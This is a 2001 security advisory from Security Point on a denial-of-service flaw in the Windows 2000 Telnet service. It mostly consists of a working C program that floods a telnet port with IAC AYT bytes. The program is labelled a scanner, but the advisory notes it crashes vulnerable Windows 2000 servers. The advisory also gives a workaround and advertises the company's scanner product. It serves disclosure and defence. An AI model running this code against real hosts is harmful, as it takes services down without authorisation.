spadv03.txt

` Security Point(R)  
[email protected]  
http://www.secpoint.com/  
  
Advisory #003  
Title: Vulnerability in Windows 2000 TELNET service.  
Date: 25-07-01  
  
  
Copyright (c) 2001 SECURITY POINT(R)  
  
Contents:  
=========  
  
I Disclaimer  
II Introduction  
III Description  
IV Demonstration code  
V Fix  
VI Contact  
VII Security Point(R) Scanner  
VIII Greetings  
  
I - Disclaimer:  
===============  
  
This paper is for educational purpose only, Security Point(R) will not be  
responsible for any damages whatsoever that have a connection with the  
information written in this paper. There are no warranties with regard  
to this information, any use of this information is at the user's own risk.  
  
II - Introduction:  
==================  
After coding a vulnerability scanner for the security hole in most telnet  
daemons under UNIX it was found that the Windows 2000 Telnet service to be  
vulnerable to a Denial of Service attack.  
This was tested against a Windows 2000 Service Pack 2 and all single patches  
applied.  
  
  
III - Description:  
==================  
This utility is meant to scan for the AYT vulnerability in telnet daemons  
build upon the BSD source.  
  
  
IV - Demonstration code  
=======================  
  
/*  
* Telnetd AYT overflow scanner, by Security Point(R)  
* Bug found by scut of TESO Security  
*  
* Date: 25/07/01  
* Author: Security Point(R)  
* WWW: http://www.secpoint.com  
* Email: [email protected]  
*   
* This program checks for the AYT overflow related to the  
* newly discovered telnetd vulnerabilities.  
*  
* Tested against:  
* Vulnerable:  
* netkit-telnet-0.10  
* FreeBSD 4.2  
* Windows 2000 Service Pack2 Telnet service will   
* crash when scanned.  
* Not vulnerable:  
* netkit-telnet-0.17  
*  
*   
*  
* Please keep us updated with the OS's that you check, and  
* report back to us on [email protected], weather the system   
* is vulnerable or not. So we can construct a full list   
* of vulnerable systems.  
*  
*  
* This source code is for educational purpose ONLY,   
* Security Point(R) will not be responsible for any damages   
* whatsoever that have a connection with this code. There are   
* no warranties with regard to this information.  
*  
* Are your networks under attack at this moment?  
*  
* With Security Point(R) Scanner you can find and repair the  
* Vulnerabilities before the bad guys get in.  
*  
* Please see http://www.secpoint.com/solutions.php  
*  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <netinet/in.h>  
#include <netdb.h>  
#include <string.h>  
#include <sys/socket.h>  
#include <signal.h>  
#include <unistd.h>  
  
struct in_addr addr;  
struct sockaddr_in address;  
struct hostent *host;  
int sock;  
  
char sendbuffer[5120];  
char buffer[5120*2];  
int i;  
  
void handle_alarm(int signum) {  
alarm(0);  
}  
  
int main (int argc, char *argv[]) {  
printf("Telnetd AYT overflow checker, by SECPoint\n");  
if (argc!=2) {  
printf("Usage: %s <host>\n", argv[0]);  
exit(EXIT_FAILURE);  
}  
printf("Host: %s\n", argv[1]);  
if ((host=gethostbyname(argv[1])) == NULL) {  
perror("gethostbyname");  
exit(0);  
exit(EXIT_FAILURE);  
}  
if (( sock = socket(AF_INET, SOCK_STREAM,0)) < 0) {  
perror("socket");  
exit(EXIT_FAILURE);  
}  
bcopy(host->h_addr, (char *)&address.sin_addr, host->h_length);  
address.sin_family=AF_INET;  
address.sin_port = htons(23); // telnet  
if (connect(sock, (struct sockaddr*)&address, sizeof(address)) < 0) {  
perror("connect");  
exit(EXIT_FAILURE);  
}  
printf("Connected to remote host...\n");  
printf("Sending telnet options... stand by...\n");  
signal(SIGALRM,handle_alarm);  
  
bzero(sendbuffer,sizeof(sendbuffer));  
for (i=0;i<sizeof(sendbuffer);i++) {  
sendbuffer[i]=(i%2) ? '\xf6' : '\xff';  
}  
  
alarm(60);  
read(sock, buffer, sizeof(buffer));  
alarm(0);  
  
write(sock, sendbuffer, strlen(sendbuffer));  
  
bzero(buffer,sizeof(buffer));  
  
alarm(60);  
if (read(sock, buffer, sizeof(buffer)) <=0) {  
printf("Telnetd on %s vulnerable\n",argv[1]);  
exit(EXIT_SUCCESS);  
}  
alarm(0);  
printf("Telnetd on %s not vulnerable\n",argv[1]);  
exit(EXIT_SUCCESS);  
}  
  
  
V - Fix:  
========  
Temporary solution:  
Disable telnet service.  
Do the following:  
  
Start->Control-Panel->Administrative-Utils->Services  
Find the telnet service and select disable  
  
Microsoft has been notified on this issue and we are awaiting patch  
information.  
  
  
VI - Contact:  
=============  
  
If you have further questions regarding this bug, then you can contact us at  
www.secpoint.com  
[email protected]  
  
VII - Security Point(R) Scanner:  
=================  
Are your networks under attack at this moment?  
  
With Security Point(R) Scanner you can find and repair the vulnerabilities   
before the bad guys get in.  
  
One of the world's most powerful security scanner, with more than 3000 checks.  
  
A useable solution for each found vulnerability.  
  
Scans: Firewalls, routers, UNIX, Windows...  
  
User-friendly interface that presents professional reports in PDF format!  
  
  
  
VIII - Greetings:  
=================  
: el8,cr,superluck,s1,cybk0red.  
`